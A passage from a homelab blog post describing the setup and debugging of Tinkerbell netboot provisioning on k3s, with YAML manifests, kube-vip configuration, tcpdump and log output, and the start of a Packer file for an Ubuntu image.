because I don&rsquo;t intend to use them. One of those is leader elections for
Tinkerbell - as I will only have one deployment, those seem unnecessary. I disable
Rufio and SecondStar as well. Rufio is a component to talk to baseboard
management controllers usually found on enterprise equipment. As I don&rsquo;t have
any such gear, it&rsquo;s unnecessary. Finally, SecondStar is a serial over SSH service
I also don&rsquo;t need.</p>
<p>The <code>dhcpMode</code> of Smee, the DHCP and general netboot component of Tinkerbell,
is more interesting. DHCP servers, especially those providing netboot options,
sometimes need to coexist. Where one DHCP server does the general IP management,
handing out dynamic and static IPs as well as stuff like NTP and DNS servers.
And then there&rsquo;s a second DHCP server which only sends out DHCP information
necessary for PXE boot. Most normal DHCP servers can do that as well, I&rsquo;m
currently using <a href="https://thekelleys.org.uk/dnsmasq/doc.html">Dnsmasq</a> to boot
my diskless machines for example, while normal IP address management is done
by the ISC DHCP server running on my OPNsense router.
Smee supports similar modes. It can either do all of the DHCP in one, handing
out IPs and netboot information, or only hand out netboot info, or even don&rsquo;t
do anything with DHCP at all, but only serve iPXE binaries and scripts. The
different running modes are described in more detail <a href="https://github.com/tinkerbell/smee/blob/main/README.md#dhcp-modes">here</a>.
I&rsquo;m using the proxy mode because I&rsquo;ve already got a DHCP server handling
address management, although I might change that for the actual production
deployment. This is because I have to set the machine&rsquo;s static IP in the
Hardware manifest anyway, as I will explain later. And I just like the fact
that static IPs would then finally be under version control. Right now, they&rsquo;re
just configured in the OPNsense UI.</p>
<p>The <code>logLevel</code> option is more important than it seems. Without it, Tinkerbell
will keep a number of low priority errors/warnings to itself. These are the
kind of &ldquo;error&rdquo; which might appear during normal operation, like DHCP packets
arriving for hosts which Tinkerbell doesn&rsquo;t know about. But for me, it made
debugging my setup a bit more difficult. I will talk about that in the next
section.</p>
<p>I&rsquo;m also disabling the kube-vip service that the chart can deploy, and instead
deploy a separate one to have more control over the deployment.</p>
<h2 id="configuring-tinkerbell">Configuring Tinkerbell</h2>
<p>The goal of my first tests was to get a feel for how Tinkerbell ticks. So I
didn&rsquo;t start out with trying to install an OS, but just wanted to see how the
netboot and the Tinkerbell manifests work.</p>
<p>Before launching the VM, I created a couple of manifests for Tinkerbell. The
core of Tinkerbell is the Workflow. It connects a Template containing actions
to be executed with a Hardware representing a host. Here is my initial
configuration:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Hardware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">disks</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">device</span>: <span style="color:#ae81ff">/dev/sda</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interfaces</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">dhcp</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">arch</span>: <span style="color:#ae81ff">x86_64</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mac</span>: <span style="color:#ae81ff">10</span>:<span style="color:#ae81ff">66</span>:<span style="color:#ae81ff">6a:07:8d:0d</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name_servers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">203.0.113.250</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">uefi</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">netboot</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowPXE</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowWorkflow</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    name: test-template
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    version: &#34;0.1&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    global_timeout: 600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    tasks:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: &#34;os installation&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        worker: &#34;{{`{{.machine_mac}}`}}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev:/dev
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev/console:/dev/console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        actions:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;echome&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: ghcr.io/jacobweinstock/waitdaemon:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            pid: host
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            command:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              - echo &#34;Hello, this is {{ .machine_mac }}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              - echo &#34;Ending script here&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              IMAGE: alpine
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              WAIT_SECONDS: 60
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              - /var/run/docker.sock:/var/run/docker.sock</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;tinkerbell.org/v1alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Workflow</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-workflow</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">templateRef</span>: <span style="color:#ae81ff">test-template</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hardwareRef</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hardwareMap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">machine_mac</span>: <span style="color:#ae81ff">10</span>:<span style="color:#ae81ff">66</span>:<span style="color:#ae81ff">6a:07:8d:0d</span>
</span></span></code></pre></div><p>Let&rsquo;s start with the Hardware manifest. It defines both, characteristics of the
machine as well as configuration for said machine. This controls both the DHCP
as well as the netboot options, also configuring whether the machine gets to
PXE boot and whether it gets to run workflows. The Hardware is documented in
more detail <a href="https://tinkerbell.org/docs/concepts/hardware/">here</a>. The Hardware
manifest has a lot more options, but for my tests, only these ones were
relevant.</p>
<p>Next is the Template. This specifies the actions to be executed. In this particular
example, I&rsquo;m only running a few simple <code>echo</code> command, as I was mostly interested
in how the netboot works. These Templates are not supposed to be machine-specific,
but instead are intended to be used by multiple workflows.</p>
<p>And finally, there&rsquo;s the Workflow itself. It specifies a Hardware, meaning a
host, and a Template to apply to that host.
The <code>hardwareMap</code> is a map of values to be made available in Templates, see my
use of the <code>machine_mac</code> in the Template to set the <code>worker</code> ID. One downside
of Tinkerbell at the moment is that only the <code>spec.disks</code> value is available
from the Hardware, but none of the others. Hence why I also had to add the
<code>machine_mac</code> in the Workflow&rsquo;s <code>hardwareMap</code>, instead of taking the value from
the <code>spec.interfaces[].dhcp</code> value.</p>
<p>To summarize what this configuration is supposed to achieve: When Tinkerbell
receives a DHCP request from a machine with the MAC address <code>10:66:6a:07:8d:0d</code>,
it will send it some netboot information, namely itself as the next server
option and an iPXE binary. That binary will fetch an iPXE script when executed
by the netbooting host, again from Tinkerbell. That script will then download
the kernel and initrd for the HookOS from Tinkerbell&rsquo;s Nginx deployment. When
those are booted up, they will launch the Tink worker in Docker and request
a workflow from Tinkerbell. It will get the <code>echome</code> action delivered and execute
that. Right now, that only runs a couple of echo commands.</p>
<p>But that did not work out as expected, at least initially.</p>
<h2 id="dhcp-problems">DHCP problems</h2>
<p>For my testing, I needed another VM. And it couldn&rsquo;t have a normal image,
because I wanted to ultimately install a fresh OS on it. Luckily, Incus supports
the <code>--empty</code> parameter to create a VM and root disk, but without setting up an
image. I launched my test VM like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>incus init test-vm --empty --vm -c limits.cpu<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span> -c limits.memory<span style="color:#f92672">=</span>4GiB --profile base --profile disk-vms -d network,hwaddr<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;10:66:6a:07:8d:0d&#34;</span>
</span></span></code></pre></div><p>This command launches a VM with a 20 GB root disk which is empty. The VM also gets
4 GiB of RAM and 4 CPU cores. Then I&rsquo;m also hardcoding the MAC address of the
NIC. This was a later addition because I deleted the VM multiple times during
testing, and it getting a new MAC each time it was created got annoying because
I had to change the static DHCP lease and Tinkerbell config each time.</p>
<p>Then I launched the VM and saw - nothing. It tried to PXE boot, but did not get
any netboot info, so I got dropped into a UEFI shell. I looked over my configuration,
but couldn&rsquo;t find anything. So I ran a quick test, to see whether hitting port 67
made it into the Tinkerbell Pod:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;foo&#34;</span> | nc -u 203.0.113.200 <span style="color:#ae81ff">67</span>
</span></span></code></pre></div><p>And indeed, the packet seemed to reach Tinkerbell, as I saw this in the logs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2025-06-01T20:48:36.172709819Z&#34;</span>,<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,<span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;smee/internal/dhcp/server/dhcp.go:62&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;error parsing DHCPv4 request&#34;</span>,<span style="color:#f92672">&#34;service&#34;</span>:<span style="color:#e6db74">&#34;smee&#34;</span>,<span style="color:#f92672">&#34;err&#34;</span>:<span style="color:#e6db74">&#34;buffer too short at position 4: have 0 bytes, want 4 bytes&#34;</span>}
</span></span></code></pre></div><p>I wasn&rsquo;t sending a DHCP message, so it was understandable that Tinkerbell didn&rsquo;t
know what to do with it. So in principle, the ServiceLB of k3s was working. But
the DHCP packets did not. Next, I ran tcpdump on the VM running Tinkerbell to
see whether the DHCP packets even made it to the machine itself:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>tcpdump: verbose output suppressed, use -v<span style="color:#f92672">[</span>v<span style="color:#f92672">]</span>... <span style="color:#66d9ef">for</span> full protocol decode
</span></span><span style="display:flex;"><span>listening on enp5s0, link-type EN10MB <span style="color:#f92672">(</span>Ethernet<span style="color:#f92672">)</span>, snapshot length <span style="color:#ae81ff">262144</span> bytes
</span></span><span style="display:flex;"><span>23:02:42.984176 IP 0.0.0.0.bootpc &gt; 255.255.255.255.bootps: BOOTP/DHCP, Request from 10:66:6a:07:8d:0d <span style="color:#f92672">(</span>oui Unknown<span style="color:#f92672">)</span>, length <span style="color:#ae81ff">253</span>
</span></span><span style="display:flex;"><span>E...V...@.#..........D.C...4.....3.......................fj...................................................................................................................................................................................
</span></span><span style="display:flex;"><span>..........................c.Sc5..9...7.....
</span></span><span style="display:flex;"><span>23:02:42.984524 IP _gateway.bootps &gt; 255.255.255.255.bootpc: BOOTP/DHCP, Reply, length <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>E..H.......B
</span></span><span style="display:flex;"><span>V.......C.D.4.......3..........
</span></span><span style="display:flex;"><span>V...........fj.............................................................................................................................................................................................................c.Sc5..6.
</span></span><span style="display:flex;"><span>V..3....T........
</span></span><span style="display:flex;"><span>V....
</span></span><span style="display:flex;"><span>V.............................
</span></span><span style="display:flex;"><span>23:02:46.363155 IP 0.0.0.0.bootpc &gt; 255.255.255.255.bootps: BOOTP/DHCP, Request from 10:66:6a:07:8d:0d <span style="color:#f92672">(</span>oui Unknown<span style="color:#f92672">)</span>, length <span style="color:#ae81ff">265</span>
</span></span><span style="display:flex;"><span>E..%V...@.#..........D.C...l.....3.......................fj...................................................................................................................................................................................
</span></span><span style="display:flex;"><span>..........................c.Sc5..6.
</span></span><span style="display:flex;"><span>V..2.
</span></span><span style="display:flex;"><span>V..9...7.....
</span></span><span style="display:flex;"><span>23:02:46.363507 IP _gateway.bootps &gt; 255.255.255.255.bootpc: BOOTP/DHCP, Reply, length <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>E..H.......B
</span></span><span style="display:flex;"><span>V.......C.D.4.......3..........
</span></span><span style="display:flex;"><span>V...........fj.............................................................................................................................................................................................................c.Sc5..6.
</span></span><span style="display:flex;"><span>V..3....P........
</span></span><span style="display:flex;"><span>V....
</span></span><span style="display:flex;"><span>V.............................
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">4</span> packets captured
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">4</span> packets received by filter
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">0</span> packets dropped by kernel
</span></span></code></pre></div><p>So yes, the packet at least arrived at the machine and on the right interface.
Running tcpdump in the network namespace of the Tinkerbell Pod showed no packet
arriving, though. So I dug a bit deeper into k3s&rsquo; ServiceLB and what it actually
does, and found this output in the logs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kmaster logs -n kube-system svclb-tinkerbell-01c2218a-p69fs -c lb-udp-67
</span></span><span style="display:flex;"><span>+ trap exit TERM INT
</span></span><span style="display:flex;"><span>+ BIN_DIR<span style="color:#f92672">=</span>/usr/sbin
</span></span><span style="display:flex;"><span>+ check_iptables_mode
</span></span><span style="display:flex;"><span>+ set +e
</span></span><span style="display:flex;"><span>+ lsmod
</span></span><span style="display:flex;"><span>+ grep -qF nf_tables
</span></span><span style="display:flex;"><span>+ <span style="color:#e6db74">&#39;[&#39;</span> <span style="color:#ae81ff">0</span> <span style="color:#e6db74">&#39;=&#39;</span> <span style="color:#ae81ff">0</span> <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>+ mode<span style="color:#f92672">=</span>nft
</span></span><span style="display:flex;"><span>+ set -e
</span></span><span style="display:flex;"><span>+ info <span style="color:#e6db74">&#39;nft mode detected&#39;</span>
</span></span><span style="display:flex;"><span>+ set_nft
</span></span><span style="display:flex;"><span>+ ln -sf xtables-nft-multi /usr/sbin/iptables
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>INFO<span style="color:#f92672">]</span>  nft mode detected
</span></span><span style="display:flex;"><span>+ ln -sf xtables-nft-multi /usr/sbin/iptables-save
</span></span><span style="display:flex;"><span>+ ln -sf xtables-nft-multi /usr/sbin/iptables-restore
</span></span><span style="display:flex;"><span>+ ln -sf xtables-nft-multi /usr/sbin/ip6tables
</span></span><span style="display:flex;"><span>+ start_proxy
</span></span><span style="display:flex;"><span>+ echo 0.0.0.0/0
</span></span><span style="display:flex;"><span>+ grep -Eq :
</span></span><span style="display:flex;"><span>+ iptables -t filter -I FORWARD -s 0.0.0.0/0 -p UDP --dport <span style="color:#ae81ff">32562</span> -j ACCEPT
</span></span><span style="display:flex;"><span>+ echo 203.0.113.200
</span></span><span style="display:flex;"><span>+ grep -Eq :
</span></span><span style="display:flex;"><span>+ cat /proc/sys/net/ipv4/ip_forward
</span></span><span style="display:flex;"><span>+ <span style="color:#e6db74">&#39;[&#39;</span> <span style="color:#ae81ff">1</span> <span style="color:#e6db74">&#39;==&#39;</span> <span style="color:#ae81ff">1</span> <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>+ iptables -t filter -A FORWARD -d 203.0.113.200/32 -p UDP --dport <span style="color:#ae81ff">32562</span> -j DROP
</span></span><span style="display:flex;"><span>+ iptables -t nat -I PREROUTING -p UDP --dport <span style="color:#ae81ff">67</span> -j DNAT --to 203.0.113.200:32562
</span></span><span style="display:flex;"><span>+ iptables -t nat -I POSTROUTING -d 203.0.113.200/32 -p UDP -j MASQUERADE
</span></span><span style="display:flex;"><span>+ <span style="color:#e6db74">&#39;[&#39;</span> <span style="color:#e6db74">&#39;!&#39;</span> -e /pause <span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>+ mkfifo /pause
</span></span></code></pre></div><p>What I <em>thought</em> I could read out of that setup was that only packets which are
directed to the exact IP of the host, <code>203.0.113.200</code>, would be forwarded to
the Tinkerbell Pod. But the initial DHCP discovery packets are of course send
to the broadcast address, as can be seen in the tcpdump from above. And so I
thought that these packets would simply get dropped, because they were not
addressed to the unicast address of the host. But I&rsquo;m no longer 100% sure about
that. Because in later testing, with kube-vip as the LoadBalancer instead of
ServiceLB, I got a similar result - no reaction by Tinkerbell in the logs. But:
I then figured out that I had the log level too low.</p>
<p>But at this point, I still thought that ServiceLB was the problem. So I decided
to disable it and instead deploy <a href="https://kube-vip.io/">kube-vip</a>. I&rsquo;ve already
got experience with it, as I&rsquo;m using it as the VIP provider for the k8s API in
my main cluster.</p>
<p>I deployed kube-vip with this Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">DaemonSet</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostNetwork</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceAccountName</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">ghcr.io/kube-vip/kube-vip:v0.9.1</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">IfNotPresent</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">manager</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">svc_enable</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_arp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_leaderelection</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">svc_election</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#ae81ff">NET_ADMIN</span>
</span></span><span style="display:flex;"><span>              - <span style="color:#ae81ff">NET_RAW</span>
</span></span><span style="display:flex;"><span>              - <span style="color:#ae81ff">SYS_TIME</span>
</span></span></code></pre></div><p>With this config, kube-vip will watch for LoadBalancer services and announce
their IP via ARP. I&rsquo;ve disabled all leader elections, as this k3s cluster
will only ever have a single node.
Kube-vip does not have any IPAM functionality, it either relies on annotations
on the Service or the <code>loadBalancerIP</code> setting. The Tinkerbell chart already
sets the <code>loadBalancerIP</code> to the <code>publicIP</code> value from the <code>values.yaml</code> file,
so I just relied on that.</p>
<p>But that did not seem to fix my problem. There still wasn&rsquo;t any reaction from
Tinkerbell to the DHCP requests. Which was when I finally realized that I had
never increased Tinkerbell&rsquo;s log level. &#x1f926;
And that was when I finally got some results:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2025-06-07T22:04:38.322503545Z&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;-1&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;smee/internal/dhcp/handler/proxy/proxy.go:211&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Ignoring packet&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;service&#34;</span>:<span style="color:#e6db74">&#34;smee&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;mac&#34;</span>:<span style="color:#e6db74">&#34;10:66:6a:07:8d:0d&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;xid&#34;</span>:<span style="color:#e6db74">&#34;0xfd39e0af&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;interface&#34;</span>:<span style="color:#e6db74">&#34;macvlan0&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;error&#34;</span>:<span style="color:#e6db74">&#34;failed to convert hardware to DHCP data: no IP data&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I didn&rsquo;t have time to dig deeper into that error at the time, but did create
<a href="https://github.com/tinkerbell/tinkerbell/issues/197">this issue</a>, requesting
that the above error message be increased in log level, so it appears with the
standard logging setting. But it turned out that I had actually run into a bug.
My Hardware manifest was okay, but Tinkerbell erroneously required some IP
configuration. This has now been fixed.</p>
<h2 id="first-successful-boot">First successful boot</h2>
<p>And with that fix, I finally got my first successful netboot:
<figure>
    <img loading="lazy" src="first-hookos-boot.png"
         alt="A screenshot of a Linux terminal. It shows the command prompt after a fresh boot. The initial text welcomes the user to HookOS, Tinkerbell&#39;s boot in-memory OS. The output also indicates that the OS is based on LinuxKit and the 5.10 kernel. Furthermore, it informs the user that the &#39;docker&#39; command can be used to access tink&#39;s worker container."/> <figcaption>
            <p>Screenshot of my first successful HookOS network boot.</p>
        </figcaption>
</figure>
</p>
<p>So that was pretty nice to see. But there was something even better going on in
the background. First of all, the two <code>echo</code> commands I had configured to be run
as tasks upon boot did run. But the cool thing was how I was able to verify that.
It turns out that Tinkerbell launches a syslog server and configures the in-memory
HookOS in such a way that it would forward the logs to Tinkerbell. And Tinkerbell
then spits them out in its own logs. This is a really nice and convenient feature
for seeing what&rsquo;s happening on the remote machine.</p>
<h2 id="side-quest-generating-an-ubuntu-image">Side Quest: Generating an Ubuntu image</h2>
<p>The obvious next step was to install an entire OS instead of just outputting some
text. But for that, I first needed a new image. My current image pipeline produces
individual images for each host, which is clumsy and should be unnecessary.
Something like cloud-init should be able to do all of the initial setup I need
to prepare for Ansible management. I did not want to just use Ubuntu&rsquo;s cloud
images, and instead create my own.</p>
<p>Initially, I looked at <a href="https://github.com/canonical/ubuntu-image">ubuntu-image</a>.
That&rsquo;s the tool that&rsquo;s used by Canonical to produce the official Ubuntu images.
But it went a bit too deep for me, and I wasn&rsquo;t able to really grok how it worked.
In addition, while the current image was for an x86 VM with a local disk, I would
also need images for Raspberry Pis without any local storage. And those would
definitely need some adaptions, as they need a special initramfs. It didn&rsquo;t look
like that would be easily possible with ubuntu-image, so I would have to use
Packer/Ansible for those. In the end, I would have different tools for different
images, which I didn&rsquo;t really like.</p>
<p>So I decided to stay with my Packer approach. One problem with my current approach
was that it reboots the image after installation and runs Ansible on it. And when
using cloud-init, that would count as the first boot, so the first boot after
actually installing the image would not run cloud-init again. But it should. So
I looked for a way to disable provisioning, and found it in <a href="https://github.com/hashicorp/packer/issues/1591">this issue</a>.</p>
<p>My <a href="https://developer.hashicorp.com/packer">HashiCorp Packer</a> file looks like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">locals</span> {
</span></span><span style="display:flex;"><span>  ubuntu-major <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;24.04&#34;</span>
</span></span><span style="display:flex;"><span>  ubuntu-minor <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2&#34;</span>
</span></span><span style="display:flex;"><span>  ubuntu-arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;amd64&#34;</span>
</span></span><span style="display:flex;"><span>  out_dir <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu-base&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;img-name&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu-base-${local.ubuntu-major}.${local.ubuntu-minor}-${local.ubuntu-arch}&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;s3-access&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/s3-creds&#34;, &#34;access&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;s3-secret&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/s3-creds&#34;, &#34;secret&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
